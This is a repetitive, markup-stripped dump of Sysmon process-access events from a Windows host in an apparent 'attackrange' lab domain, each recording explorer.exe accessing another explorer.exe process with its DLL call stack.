16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235882Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235881Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235880Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235879Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235878Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235877Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235876Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235875Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235874Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235873Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235872Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235871Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235870Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235869Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235868Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235867Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235866Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235865Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235864Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235863Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235862Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235861Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235860Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235859Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235858Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235857Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235856Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235855Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 